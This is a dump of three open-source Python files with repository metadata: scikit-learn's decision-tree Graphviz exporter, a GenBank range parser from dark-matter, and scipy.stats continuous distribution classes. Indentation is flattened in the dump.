criterion = "mse"
else:
criterion = "impurity"
if tree.children_left[node_id] == _tree.TREE_LEAF:
return "%s = %.4f\\nsamples = %s\\nvalue = %s" \
% (criterion,
tree.impurity[node_id],
tree.n_node_samples[node_id],
value)
else:
if feature_names is not None:
feature = feature_names[tree.feature[node_id]]
else:
feature = "X[%s]" % tree.feature[node_id]
return "%s <= %.4f\\n%s = %s\\nsamples = %s" \
% (feature,
tree.threshold[node_id],
criterion,
tree.impurity[node_id],
tree.n_node_samples[node_id])
def recurse(tree, node_id, parent=None, depth=0):
if node_id == _tree.TREE_LEAF:
raise ValueError("Invalid node_id %s" % _tree.TREE_LEAF)
left_child = tree.children_left[node_id]
right_child = tree.children_right[node_id]
# Add node with description
if max_depth is None or depth <= max_depth:
out_file.write('%d [label="%s", shape="box"] ;\n' %
(node_id, node_to_str(tree, node_id)))
if parent is not None:
# Add edge to parent
out_file.write('%d -> %d ;\n' % (parent, node_id))
if left_child != _tree.TREE_LEAF:
recurse(tree, left_child, parent=node_id, depth=depth + 1)
recurse(tree, right_child, parent=node_id, depth=depth + 1)
else:
out_file.write('%d [label="(...)", shape="box"] ;\n' % node_id)
if parent is not None:
# Add edge to parent
out_file.write('%d -> %d ;\n' % (parent, node_id))
own_file = False
if isinstance(out_file, six.string_types):
if six.PY3:
out_file = open(out_file, "w", encoding="utf-8")
else:
out_file = open(out_file, "wb")
own_file = True
out_file.write("digraph Tree {\n")
if isinstance(decision_tree, _tree.Tree):
recurse(decision_tree, 0)
else:
recurse(decision_tree.tree_, 0)
out_file.write("}")
if own_file:
out_file.close()
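# Usage sketch (illustrative): export a depth-limited view of a fitted tree
# and render it with the graphviz `dot` CLI (assumed to be installed):
#   from sklearn.datasets import load_iris
#   from sklearn import tree
#   import subprocess
#   iris = load_iris()
#   clf = tree.DecisionTreeClassifier().fit(iris.data, iris.target)
#   tree.export_graphviz(clf, out_file='tree.dot', max_depth=3)
#   subprocess.check_call(['dot', '-Tpng', 'tree.dot', '-o', 'tree.png'])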
|
depet/scikit-learn
|
sklearn/tree/export.py
|
Python
|
bsd-3-clause
| 4,623
|
[
"Brian"
] |
f329a8affbafbe85fdb707bb457c6e3291130c713d337740ade6ebb953ba1325
|
import warnings
class GenomeRanges(object):
"""
Split and manage a GenBank range string as converted by BioPython.
@param rangeStr: A C{str} indicating the (0-based) genome nucleotide
offsets covered by a protein. This can have the following example
forms:
[9462:10137](+)
[11969:12575](-)
join{[126386:126881](-), [125941:126232](+)}
join{[153005:153821](+), [82030:82618](-), [80480:81305](-)}
Note that this is the string as returned from BioPython SeqIO.parse
when it parses a GenBank flat file, not the string that is in such a
file. For that use the C{splitRange} function you can find in an
earlier version of this file (i.e., look in its git history).
@raise ValueError: If C{rangeStr} cannot be correctly parsed.
    @return: A C{tuple} whose elements are 3-C{tuple}s holding the C{int} start
and stop offsets and a C{bool} that indicates whether the offsets
corresponds to the forward strand (i.e., will be C{True} when
there is a '(+)' in a range and C{False} when there is a '(-)' which
indicates the reverse strand).
Example arguments and their return values:
'[9462:10137](+)' => ((9462, 10137, True),)
'[11969:12575](-)' => ((11969, 12575, False),)
'join{[126386:126881](-), [125941:126232](+)}' =>
((126386, 126881, False),
(125941, 126232, True))
"""
def __init__(self, rangeStr):
if rangeStr.startswith('join{') and rangeStr[-1] == '}':
join = True
inner = rangeStr[5:-1]
else:
join = False
inner = rangeStr
ranges = []
subRanges = inner.split(', ')
nRanges = len(subRanges)
if nRanges == 1 and join:
raise ValueError('Could not parse GenBank range string "%s". '
'join{} can only be used with multiple ranges.' %
rangeStr)
elif nRanges > 1 and not join:
raise ValueError('Could not parse GenBank range string "%s". '
'Multiple ranges must be wrapped in join{}.' %
rangeStr)
for subRange in subRanges:
if subRange.endswith('](+)'):
forward = True
elif subRange.endswith('](-)'):
forward = False
else:
raise ValueError('Could not parse GenBank range string "%s". '
'Range "%s" does not end with ](+) or ](-).' %
(rangeStr, subRange))
if not subRange.startswith('['):
raise ValueError('Could not parse GenBank range string "%s". '
'Range "%s" does not start with "[".' %
(rangeStr, subRange))
try:
start, stop = subRange[1:-4].split(':')
except ValueError as e:
raise ValueError('Could not parse GenBank range string "%s". '
'Original parsing ValueError was "%s".' %
(rangeStr, e))
else:
if start.startswith('<'):
start = start[1:]
if stop.startswith('>'):
stop = stop[1:]
start, stop = map(int, (start, stop))
if start > stop:
raise ValueError(
'Could not parse GenBank range string "%s". '
'Offset values (%d, %d) cannot decrease.' %
(rangeStr, start, stop))
ranges.append((start, stop, forward))
self.ranges = self._mergeContiguousRanges(ranges)
self._nRanges = len(self.ranges)
def _mergeContiguousRanges(self, ranges):
"""
Merge ranges that are contiguous (follow each other immediately on the
genome).
@param ranges: An iterable of (start, stop, forward) tuples.
@return: A C{tuple} of (start, stop, forward) tuples with contiguous
ranges found in C{ranges} merged.
"""
result = []
lastStart = lastStop = lastForward = None
for index, (start, stop, forward) in enumerate(ranges):
if lastStart is None:
lastStart, lastStop, lastForward = start, stop, forward
else:
if start == lastStop and forward == lastForward:
# This range continues the previous one.
warnings.warn(
'Contiguous GenBank ranges detected: [%d:%d] '
'followed by [%d:%d].' %
(lastStart, lastStop, start, stop))
lastStop = stop
else:
# Emit the range that just got terminated.
result.append((lastStart, lastStop, lastForward))
# And remember this one.
lastStart, lastStop, lastForward = start, stop, forward
# Emit the final range.
result.append((lastStart, lastStop, lastForward))
return tuple(result)
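    # Illustrative merge behavior: ((0, 10, True), (10, 20, True)) collapses
    # to ((0, 20, True),) with a warning, while ((0, 10, True), (10, 20,
    # False)) is left as two ranges because the strands differ.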
def __str__(self):
return '<%s: %s>' % (
self.__class__.__name__, ', '.join(map(str, self.ranges)))
def circular(self, genomeLength):
"""
Determine whether the offset ranges of a protein in a genome span the
end of the genome (indicating that the genome may be circular).
@param genomeLength: The C{int} length of the genome.
@return: A C{bool}, C{True} if the ranges overlap the genome end.
"""
if self._nRanges == 1:
# If there is only one range, we simply return False even though it
# could be that the single range spans the whole genome. That is
# not the same as having two ranges, one of which ends at the end
# of the genome and the next starting at the start of the genome.
#
# I.e., a range tuples like this ((0, 100, False),) on a genome of
# length 100 will return False, whereas ((0, 75, False), (75, 100,
# False)) on a genome of length 100 will return True.
#
# The decision about whether you consider the degenerate case of
# ((0, 100, False),) to indicate circularity is a bit arbitrary.
# Here I've decided that it should not because I intend to use
# this function to decide whether to output multiple SAM lines
# for the match of a read against a reference. In this
# degenerate case just a single SAM line suffices, whereas in a
# non-degenerate case (such as ((0, 75, False), (75, 100, False))
# on a genome of length 100), a chimeric SAM alignment must be
# used, which requires quite different processing than a normal
# linear match. YMMV, and if you don't like it you can easily
# add an argument to this function that changes this behaviour
# (leaving the default to do what the code currently does).
return False
for index, (start, stop, _) in enumerate(self.ranges):
if stop == genomeLength:
return self.ranges[(index + 1) % self._nRanges][0] == 0
return False
def startInGenome(self, match):
"""
Calculate the position in the nucleotide genome where a DIAMOND match
begins.
@param match: A C{dict} with information about the DIAMOND match, as
returned by C{self._preprocessMatch}. Must contain a 'sstart' key
giving a 1-based C{int} offset of the start of the match in the
protein.
@return: The C{int} offset of the start of the DIAMOND match in the
genome.
"""
# Calculate the start of the match in the genome, given its start in
# the protein.
offsetInGenome = remaining = (match['sstart'] - 1) * 3
for start, stop, _ in self.ranges:
rangeWidth = stop - start
if remaining < rangeWidth:
# The match starts in this range.
return start + remaining
else:
remaining -= rangeWidth
else:
raise ValueError(
'Starting nucleotide offset %d not found in protein '
'nucleotide ranges %s.' %
(offsetInGenome,
', '.join(('(%d, %d)' % (i, j))
for i, j, _ in self.ranges)))
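    # A worked example of the arithmetic above (hypothetical values, not
    # taken from the codebase): with self.ranges == ((100, 130, True),
    # (200, 230, True)), a match with sstart=6 begins at protein
    # nucleotide offset (6 - 1) * 3 = 15, which falls inside the first
    # range (width 30), so the genome offset is 100 + 15 = 115. With
    # sstart=12 the offset is 33, so the first range is skipped
    # (33 - 30 = 3 remaining) and the result is 200 + 3 = 203.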
def orientations(self):
"""
Produce the set of all orientations for our ranges.
@return: A C{set} of C{True} and C{False} range orientations.
"""
return set(r[2] for r in self.ranges)
def distinctRangeCount(self, genomeLength):
"""
Determine the number of distinct ranges, given the genome length.
@param genomeLength: The C{int} length of the genome.
@return: An C{int} which is the number of ranges that are not
contiguous with one another.
"""
return len(self.ranges) - int(self.circular(genomeLength))
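# A minimal usage sketch (the enclosing class is defined above this excerpt;
# the name GenomeRanges below is assumed for illustration only):
# >>> gr = GenomeRanges('join{[126386:126881](-), [125941:126232](+)}')
# >>> gr.ranges
# ((126386, 126881, False), (125941, 126232, True))
# >>> gr.orientations() == {True, False}
# True
# >>> gr.circular(126881)
# False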
|
terrycojones/dark-matter
|
dark/genbank.py
|
Python
|
mit
| 9,316
|
[
"Biopython"
] |
cb93622f6eb03b014da707155b8d312088aa6a0ff6491139b284382c798e219f
|
#
# Author: Travis Oliphant 2002-2011 with contributions from
# SciPy Developers 2004-2011
#
from __future__ import division, print_function, absolute_import
import warnings
from scipy.special import comb
from scipy.misc.doccer import inherit_docstring_from
from scipy import special
from scipy import optimize
from scipy import integrate
from scipy.special import (gammaln as gamln, gamma as gam, boxcox, boxcox1p,
inv_boxcox, inv_boxcox1p)
from numpy import (where, arange, putmask, ravel, sum, shape,
log, sqrt, exp, arctanh, tan, sin, arcsin, arctan,
tanh, cos, cosh, sinh)
from numpy import polyval, place, extract, any, asarray, nan, inf, pi
import numpy as np
from . import vonmises_cython
from ._tukeylambda_stats import (tukeylambda_variance as _tlvar,
tukeylambda_kurtosis as _tlkurt)
from ._distn_infrastructure import (
rv_continuous, valarray, _skew, _kurtosis, _lazywhere,
_ncx2_log_pdf, _ncx2_pdf, _ncx2_cdf, get_distribution_names,
)
from ._constants import _XMIN, _EULER, _ZETA3
## Kolmogorov-Smirnov one-sided and two-sided test statistics
class ksone_gen(rv_continuous):
"""General Kolmogorov-Smirnov one-sided test.
%(default)s
"""
def _cdf(self, x, n):
return 1.0 - special.smirnov(n, x)
def _ppf(self, q, n):
return special.smirnovi(n, 1.0 - q)
ksone = ksone_gen(a=0.0, name='ksone')
class kstwobign_gen(rv_continuous):
"""Kolmogorov-Smirnov two-sided test for large N.
%(default)s
"""
def _cdf(self, x):
return 1.0 - special.kolmogorov(x)
def _sf(self, x):
return special.kolmogorov(x)
def _ppf(self, q):
return special.kolmogi(1.0-q)
kstwobign = kstwobign_gen(a=0.0, name='kstwobign')
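# A short usage sketch (not part of the original module): the limiting
# two-sided Kolmogorov-Smirnov distribution yields the familiar critical
# values, e.g. the 5% point is roughly 1.358.
# >>> from scipy import stats
# >>> stats.kstwobign.ppf(0.95)   # approximately 1.3581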
## Normal distribution
# loc = mu, scale = std
# Keep these implementations out of the class definition so they can be reused
# by other distributions.
_norm_pdf_C = np.sqrt(2*pi)
_norm_pdf_logC = np.log(_norm_pdf_C)
def _norm_pdf(x):
return exp(-x**2/2.0) / _norm_pdf_C
def _norm_logpdf(x):
return -x**2 / 2.0 - _norm_pdf_logC
def _norm_cdf(x):
return special.ndtr(x)
def _norm_logcdf(x):
return special.log_ndtr(x)
def _norm_ppf(q):
return special.ndtri(q)
def _norm_sf(x):
return special.ndtr(-x)
def _norm_logsf(x):
return special.log_ndtr(-x)
def _norm_isf(q):
return -special.ndtri(q)
class norm_gen(rv_continuous):
"""A normal continuous random variable.
The location (loc) keyword specifies the mean.
The scale (scale) keyword specifies the standard deviation.
%(before_notes)s
Notes
-----
The probability density function for `norm` is::
norm.pdf(x) = exp(-x**2/2)/sqrt(2*pi)
%(example)s
"""
def _rvs(self):
return self._random_state.standard_normal(self._size)
def _pdf(self, x):
return _norm_pdf(x)
def _logpdf(self, x):
return _norm_logpdf(x)
def _cdf(self, x):
return _norm_cdf(x)
def _logcdf(self, x):
return _norm_logcdf(x)
def _sf(self, x):
return _norm_sf(x)
def _logsf(self, x):
return _norm_logsf(x)
def _ppf(self, q):
return _norm_ppf(q)
def _isf(self, q):
return _norm_isf(q)
def _stats(self):
return 0.0, 1.0, 0.0, 0.0
def _entropy(self):
return 0.5*(log(2*pi)+1)
@inherit_docstring_from(rv_continuous)
def fit(self, data, **kwds):
"""%(super)s
This function (norm_gen.fit) uses explicit formulas for the maximum
likelihood estimation of the parameters, so the `optimizer` argument
is ignored.
"""
floc = kwds.get('floc', None)
fscale = kwds.get('fscale', None)
if floc is not None and fscale is not None:
# This check is for consistency with `rv_continuous.fit`.
# Without this check, this function would just return the
# parameters that were given.
raise ValueError("All parameters fixed. There is nothing to "
"optimize.")
data = np.asarray(data)
if floc is None:
loc = data.mean()
else:
loc = floc
if fscale is None:
scale = np.sqrt(((data - loc)**2).mean())
else:
scale = fscale
return loc, scale
norm = norm_gen(name='norm')
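# A short usage sketch (not part of the original module): loc and scale
# are applied by the rv_continuous machinery around the standard forms
# defined above.
# >>> from scipy import stats
# >>> stats.norm.pdf(0.0)                      # 1/sqrt(2*pi), ~0.39894
# >>> stats.norm(loc=2.0, scale=3.0).ppf(0.5)  # median equals loc: 2.0
# >>> stats.norm.fit([1.0, 2.0, 3.0])          # explicit MLE: (2.0, sqrt(2/3))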
class alpha_gen(rv_continuous):
"""An alpha continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `alpha` is::
alpha.pdf(x, a) = 1/(x**2*Phi(a)*sqrt(2*pi)) * exp(-1/2 * (a-1/x)**2),
where ``Phi(alpha)`` is the normal CDF, ``x > 0``, and ``a > 0``.
%(example)s
"""
def _pdf(self, x, a):
return 1.0/(x**2)/special.ndtr(a)*_norm_pdf(a-1.0/x)
def _logpdf(self, x, a):
return -2*log(x) + _norm_logpdf(a-1.0/x) - log(special.ndtr(a))
def _cdf(self, x, a):
return special.ndtr(a-1.0/x) / special.ndtr(a)
def _ppf(self, q, a):
return 1.0/asarray(a-special.ndtri(q*special.ndtr(a)))
def _stats(self, a):
return [inf]*2 + [nan]*2
alpha = alpha_gen(a=0.0, name='alpha')
class anglit_gen(rv_continuous):
"""An anglit continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `anglit` is::
anglit.pdf(x) = sin(2*x + pi/2) = cos(2*x),
for ``-pi/4 <= x <= pi/4``.
%(example)s
"""
def _pdf(self, x):
return cos(2*x)
def _cdf(self, x):
return sin(x+pi/4)**2.0
def _ppf(self, q):
return (arcsin(sqrt(q))-pi/4)
def _stats(self):
return 0.0, pi*pi/16-0.5, 0.0, -2*(pi**4 - 96)/(pi*pi-8)**2
def _entropy(self):
return 1-log(2)
anglit = anglit_gen(a=-pi/4, b=pi/4, name='anglit')
class arcsine_gen(rv_continuous):
"""An arcsine continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `arcsine` is::
arcsine.pdf(x) = 1/(pi*sqrt(x*(1-x)))
for ``0 < x < 1``.
%(example)s
"""
def _pdf(self, x):
return 1.0/pi/sqrt(x*(1-x))
def _cdf(self, x):
return 2.0/pi*arcsin(sqrt(x))
def _ppf(self, q):
return sin(pi/2.0*q)**2.0
def _stats(self):
mu = 0.5
mu2 = 1.0/8
g1 = 0
g2 = -3.0/2.0
return mu, mu2, g1, g2
def _entropy(self):
return -0.24156447527049044468
arcsine = arcsine_gen(a=0.0, b=1.0, name='arcsine')
class FitDataError(ValueError):
# This exception is raised by, for example, beta_gen.fit when both floc
# and fscale are fixed and there are values in the data not in the open
# interval (floc, floc+fscale).
def __init__(self, distr, lower, upper):
self.args = (
"Invalid values in `data`. Maximum likelihood "
"estimation with {distr!r} requires that {lower!r} < x "
"< {upper!r} for each x in `data`.".format(
distr=distr, lower=lower, upper=upper),
)
class FitSolverError(RuntimeError):
# This exception is raised by, for example, beta_gen.fit when
# optimize.fsolve returns with ier != 1.
def __init__(self, mesg):
emsg = "Solver for the MLE equations failed to converge: "
emsg += mesg.replace('\n', '')
self.args = (emsg,)
def _beta_mle_a(a, b, n, s1):
# The zeros of this function give the MLE for `a`, with
# `b`, `n` and `s1` given. `s1` is the sum of the logs of
# the data. `n` is the number of data points.
psiab = special.psi(a + b)
func = s1 - n * (-psiab + special.psi(a))
return func
def _beta_mle_ab(theta, n, s1, s2):
# Zeros of this function are critical points of
# the maximum likelihood function. Solving this system
# for theta (which contains a and b) gives the MLE for a and b
# given `n`, `s1` and `s2`. `s1` is the sum of the logs of the data,
# and `s2` is the sum of the logs of 1 - data. `n` is the number
# of data points.
a, b = theta
psiab = special.psi(a + b)
func = [s1 - n * (-psiab + special.psi(a)),
s2 - n * (-psiab + special.psi(b))]
return func
class beta_gen(rv_continuous):
"""A beta continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `beta` is::
gamma(a+b) * x**(a-1) * (1-x)**(b-1)
beta.pdf(x, a, b) = ------------------------------------
gamma(a)*gamma(b)
for ``0 < x < 1``, ``a > 0``, ``b > 0``, where ``gamma(z)`` is the gamma
function (`scipy.special.gamma`).
%(example)s
"""
def _rvs(self, a, b):
return self._random_state.beta(a, b, self._size)
def _pdf(self, x, a, b):
return np.exp(self._logpdf(x, a, b))
def _logpdf(self, x, a, b):
lPx = special.xlog1py(b-1.0, -x) + special.xlogy(a-1.0, x)
lPx -= special.betaln(a, b)
return lPx
def _cdf(self, x, a, b):
return special.btdtr(a, b, x)
def _ppf(self, q, a, b):
return special.btdtri(a, b, q)
def _stats(self, a, b):
mn = a*1.0 / (a + b)
var = (a*b*1.0)/(a+b+1.0)/(a+b)**2.0
g1 = 2.0*(b-a)*sqrt((1.0+a+b)/(a*b)) / (2+a+b)
g2 = 6.0*(a**3 + a**2*(1-2*b) + b**2*(1+b) - 2*a*b*(2+b))
g2 /= a*b*(a+b+2)*(a+b+3)
return mn, var, g1, g2
def _fitstart(self, data):
g1 = _skew(data)
g2 = _kurtosis(data)
def func(x):
a, b = x
sk = 2*(b-a)*sqrt(a + b + 1) / (a + b + 2) / sqrt(a*b)
ku = a**3 - a**2*(2*b-1) + b**2*(b+1) - 2*a*b*(b+2)
ku /= a*b*(a+b+2)*(a+b+3)
ku *= 6
return [sk-g1, ku-g2]
a, b = optimize.fsolve(func, (1.0, 1.0))
return super(beta_gen, self)._fitstart(data, args=(a, b))
@inherit_docstring_from(rv_continuous)
def fit(self, data, *args, **kwds):
"""%(super)s
In the special case where both `floc` and `fscale` are given, a
`ValueError` is raised if any value `x` in `data` does not satisfy
`floc < x < floc + fscale`.
"""
# Override rv_continuous.fit, so we can more efficiently handle the
# case where floc and fscale are given.
f0 = kwds.get('f0', None)
f1 = kwds.get('f1', None)
floc = kwds.get('floc', None)
fscale = kwds.get('fscale', None)
if floc is None or fscale is None:
# do general fit
return super(beta_gen, self).fit(data, *args, **kwds)
if f0 is not None and f1 is not None:
# This check is for consistency with `rv_continuous.fit`.
raise ValueError("All parameters fixed. There is nothing to "
"optimize.")
# Special case: loc and scale are constrained, so we are fitting
# just the shape parameters. This can be done much more efficiently
# than the method used in `rv_continuous.fit`. (See the subsection
# "Two unknown parameters" in the section "Maximum likelihood" of
# the Wikipedia article on the Beta distribution for the formulas.)
# Normalize the data to the interval [0, 1].
data = (ravel(data) - floc) / fscale
if np.any(data <= 0) or np.any(data >= 1):
raise FitDataError("beta", lower=floc, upper=floc + fscale)
xbar = data.mean()
if f0 is not None or f1 is not None:
# One of the shape parameters is fixed.
if f0 is not None:
# The shape parameter a is fixed, so swap the parameters
# and flip the data. We always solve for `a`. The result
# will be swapped back before returning.
b = f0
data = 1 - data
xbar = 1 - xbar
else:
b = f1
# Initial guess for a. Use the formula for the mean of the beta
# distribution, E[x] = a / (a + b), to generate a reasonable
# starting point based on the mean of the data and the given
# value of b.
a = b * xbar / (1 - xbar)
# Compute the MLE for `a` by solving _beta_mle_a.
theta, info, ier, mesg = optimize.fsolve(
_beta_mle_a, a,
args=(b, len(data), np.log(data).sum()),
full_output=True
)
if ier != 1:
raise FitSolverError(mesg=mesg)
a = theta[0]
if f0 is not None:
# The shape parameter a was fixed, so swap back the
# parameters.
a, b = b, a
else:
# Neither of the shape parameters is fixed.
# s1 and s2 are used in the extra arguments passed to _beta_mle_ab
# by optimize.fsolve.
s1 = np.log(data).sum()
s2 = np.log(1 - data).sum()
# Use the "method of moments" to estimate the initial
# guess for a and b.
fac = xbar * (1 - xbar) / data.var(ddof=0) - 1
a = xbar * fac
b = (1 - xbar) * fac
# Compute the MLE for a and b by solving _beta_mle_ab.
theta, info, ier, mesg = optimize.fsolve(
_beta_mle_ab, [a, b],
args=(len(data), s1, s2),
full_output=True
)
if ier != 1:
raise FitSolverError(mesg=mesg)
a, b = theta
return a, b, floc, fscale
beta = beta_gen(a=0.0, b=1.0, name='beta')
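# A short usage sketch (not part of the original module): fixing both floc
# and fscale routes beta.fit through the fast MLE branch implemented above.
# >>> from scipy import stats
# >>> data = stats.beta.rvs(2.0, 5.0, size=1000, random_state=1234)
# >>> stats.beta.fit(data, floc=0, fscale=1)   # (a_hat, b_hat, 0, 1)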
class betaprime_gen(rv_continuous):
"""A beta prime continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `betaprime` is::
betaprime.pdf(x, a, b) = x**(a-1) * (1+x)**(-a-b) / beta(a, b)
for ``x > 0``, ``a > 0``, ``b > 0``, where ``beta(a, b)`` is the beta
function (see `scipy.special.beta`).
%(example)s
"""
def _rvs(self, a, b):
sz, rndm = self._size, self._random_state
u1 = gamma.rvs(a, size=sz, random_state=rndm)
u2 = gamma.rvs(b, size=sz, random_state=rndm)
return (u1 / u2)
def _pdf(self, x, a, b):
return np.exp(self._logpdf(x, a, b))
def _logpdf(self, x, a, b):
return (special.xlogy(a-1.0, x) - special.xlog1py(a+b, x) -
special.betaln(a, b))
def _cdf_skip(self, x, a, b):
# remove for now: special.hyp2f1 is incorrect for large a
x = where(x == 1.0, 1.0-1e-6, x)
return pow(x, a)*special.hyp2f1(a+b, a, 1+a, -x)/a/special.beta(a, b)
def _munp(self, n, a, b):
if (n == 1.0):
return where(b > 1, a/(b-1.0), inf)
elif (n == 2.0):
return where(b > 2, a*(a+1.0)/((b-2.0)*(b-1.0)), inf)
elif (n == 3.0):
return where(b > 3, a*(a+1.0)*(a+2.0)/((b-3.0)*(b-2.0)*(b-1.0)),
inf)
elif (n == 4.0):
return where(b > 4,
a*(a+1.0)*(a+2.0)*(a+3.0)/((b-4.0)*(b-3.0)
* (b-2.0)*(b-1.0)), inf)
else:
raise NotImplementedError
betaprime = betaprime_gen(a=0.0, name='betaprime')
class bradford_gen(rv_continuous):
"""A Bradford continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `bradford` is::
bradford.pdf(x, c) = c / (k * (1+c*x)),
for ``0 < x < 1``, ``c > 0`` and ``k = log(1+c)``.
%(example)s
"""
def _pdf(self, x, c):
return c / (c*x + 1.0) / log(1.0+c)
def _cdf(self, x, c):
return log(1.0+c*x) / log(c+1.0)
def _ppf(self, q, c):
return ((1.0+c)**q-1)/c
def _stats(self, c, moments='mv'):
k = log(1.0+c)
mu = (c-k)/(c*k)
mu2 = ((c+2.0)*k-2.0*c)/(2*c*k*k)
g1 = None
g2 = None
if 's' in moments:
g1 = sqrt(2)*(12*c*c-9*c*k*(c+2)+2*k*k*(c*(c+3)+3))
g1 /= sqrt(c*(c*(k-2)+2*k))*(3*c*(k-2)+6*k)
if 'k' in moments:
g2 = (c**3*(k-3)*(k*(3*k-16)+24)+12*k*c*c*(k-4)*(k-3)
+ 6*c*k*k*(3*k-14) + 12*k**3)
g2 /= 3*c*(c*(k-2)+2*k)**2
return mu, mu2, g1, g2
def _entropy(self, c):
k = log(1+c)
return k/2.0 - log(c/k)
bradford = bradford_gen(a=0.0, b=1.0, name='bradford')
class burr_gen(rv_continuous):
"""A Burr continuous random variable.
%(before_notes)s
See Also
--------
fisk : a special case of `burr` with ``d = 1``
Notes
-----
The probability density function for `burr` is::
burr.pdf(x, c, d) = c * d * x**(-c-1) * (1+x**(-c))**(-d-1)
for ``x > 0``.
%(example)s
"""
def _pdf(self, x, c, d):
return c*d*(x**(-c-1.0))*((1+x**(-c*1.0))**(-d-1.0))
def _cdf(self, x, c, d):
        return (1+x**(-c*1.0))**(-d*1.0)
def _ppf(self, q, c, d):
return (q**(-1.0/d)-1)**(-1.0/c)
def _munp(self, n, c, d):
nc = 1. * n / c
return d * special.beta(1.0 - nc, d + nc)
burr = burr_gen(a=0.0, name='burr')
class fisk_gen(burr_gen):
"""A Fisk continuous random variable.
The Fisk distribution is also known as the log-logistic distribution, and
equals the Burr distribution with ``d == 1``.
%(before_notes)s
See Also
--------
burr
%(example)s
"""
def _pdf(self, x, c):
return burr_gen._pdf(self, x, c, 1.0)
def _cdf(self, x, c):
return burr_gen._cdf(self, x, c, 1.0)
def _ppf(self, x, c):
return burr_gen._ppf(self, x, c, 1.0)
def _munp(self, n, c):
return burr_gen._munp(self, n, c, 1.0)
def _entropy(self, c):
return 2 - log(c)
fisk = fisk_gen(a=0.0, name='fisk')
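# A short consistency sketch (not part of the original module): fisk is
# burr with d fixed at 1, so the two CDFs agree there.
# >>> import numpy as np
# >>> from scipy import stats
# >>> np.allclose(stats.burr.cdf(2.0, 3.0, 1.0), stats.fisk.cdf(2.0, 3.0))
# True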
# median = loc
class cauchy_gen(rv_continuous):
"""A Cauchy continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `cauchy` is::
cauchy.pdf(x) = 1 / (pi * (1 + x**2))
%(example)s
"""
def _pdf(self, x):
return 1.0/pi/(1.0+x*x)
def _cdf(self, x):
return 0.5 + 1.0/pi*arctan(x)
def _ppf(self, q):
return tan(pi*q-pi/2.0)
def _sf(self, x):
return 0.5 - 1.0/pi*arctan(x)
def _isf(self, q):
return tan(pi/2.0-pi*q)
def _stats(self):
return inf, inf, nan, nan
def _entropy(self):
return log(4*pi)
def _fitstart(self, data, args=None):
return (0, 1)
cauchy = cauchy_gen(name='cauchy')
class chi_gen(rv_continuous):
"""A chi continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `chi` is::
chi.pdf(x, df) = x**(df-1) * exp(-x**2/2) / (2**(df/2-1) * gamma(df/2))
for ``x > 0``.
Special cases of `chi` are:
- ``chi(1, loc, scale)`` is equivalent to `halfnorm`
- ``chi(2, 0, scale)`` is equivalent to `rayleigh`
- ``chi(3, 0, scale)`` is equivalent to `maxwell`
%(example)s
"""
def _rvs(self, df):
sz, rndm = self._size, self._random_state
return sqrt(chi2.rvs(df, size=sz, random_state=rndm))
def _pdf(self, x, df):
return x**(df-1.)*exp(-x*x*0.5)/(2.0)**(df*0.5-1)/gam(df*0.5)
def _cdf(self, x, df):
return special.gammainc(df*0.5, 0.5*x*x)
def _ppf(self, q, df):
return sqrt(2*special.gammaincinv(df*0.5, q))
def _stats(self, df):
mu = sqrt(2)*special.gamma(df/2.0+0.5)/special.gamma(df/2.0)
mu2 = df - mu*mu
g1 = (2*mu**3.0 + mu*(1-2*df))/asarray(np.power(mu2, 1.5))
g2 = 2*df*(1.0-df)-6*mu**4 + 4*mu**2 * (2*df-1)
g2 /= asarray(mu2**2.0)
return mu, mu2, g1, g2
chi = chi_gen(a=0.0, name='chi')
## Chi-squared (gamma-distributed with loc=0 and scale=2 and shape=df/2)
class chi2_gen(rv_continuous):
"""A chi-squared continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `chi2` is::
chi2.pdf(x, df) = 1 / (2*gamma(df/2)) * (x/2)**(df/2-1) * exp(-x/2)
%(example)s
"""
def _rvs(self, df):
return self._random_state.chisquare(df, self._size)
def _pdf(self, x, df):
return exp(self._logpdf(x, df))
def _logpdf(self, x, df):
return special.xlogy(df/2.-1, x) - x/2. - gamln(df/2.) - (log(2)*df)/2.
def _cdf(self, x, df):
return special.chdtr(df, x)
def _sf(self, x, df):
return special.chdtrc(df, x)
def _isf(self, p, df):
return special.chdtri(df, p)
def _ppf(self, p, df):
return self._isf(1.0-p, df)
def _stats(self, df):
mu = df
mu2 = 2*df
g1 = 2*sqrt(2.0/df)
g2 = 12.0/df
return mu, mu2, g1, g2
chi2 = chi2_gen(a=0.0, name='chi2')
class cosine_gen(rv_continuous):
"""A cosine continuous random variable.
%(before_notes)s
Notes
-----
The cosine distribution is an approximation to the normal distribution.
The probability density function for `cosine` is::
cosine.pdf(x) = 1/(2*pi) * (1+cos(x))
for ``-pi <= x <= pi``.
%(example)s
"""
def _pdf(self, x):
return 1.0/2/pi*(1+cos(x))
def _cdf(self, x):
return 1.0/2/pi*(pi + x + sin(x))
def _stats(self):
return 0.0, pi*pi/3.0-2.0, 0.0, -6.0*(pi**4-90)/(5.0*(pi*pi-6)**2)
def _entropy(self):
return log(4*pi)-1.0
cosine = cosine_gen(a=-pi, b=pi, name='cosine')
class dgamma_gen(rv_continuous):
"""A double gamma continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `dgamma` is::
dgamma.pdf(x, a) = 1 / (2*gamma(a)) * abs(x)**(a-1) * exp(-abs(x))
for ``a > 0``.
%(example)s
"""
def _rvs(self, a):
sz, rndm = self._size, self._random_state
u = rndm.random_sample(size=sz)
gm = gamma.rvs(a, size=sz, random_state=rndm)
return gm * where(u >= 0.5, 1, -1)
def _pdf(self, x, a):
ax = abs(x)
return 1.0/(2*special.gamma(a))*ax**(a-1.0) * exp(-ax)
def _logpdf(self, x, a):
ax = abs(x)
return special.xlogy(a-1.0, ax) - ax - log(2) - gamln(a)
def _cdf(self, x, a):
fac = 0.5*special.gammainc(a, abs(x))
return where(x > 0, 0.5 + fac, 0.5 - fac)
def _sf(self, x, a):
fac = 0.5*special.gammainc(a, abs(x))
return where(x > 0, 0.5-fac, 0.5+fac)
def _ppf(self, q, a):
fac = special.gammainccinv(a, 1-abs(2*q-1))
return where(q > 0.5, fac, -fac)
def _stats(self, a):
mu2 = a*(a+1.0)
return 0.0, mu2, 0.0, (a+2.0)*(a+3.0)/mu2-3.0
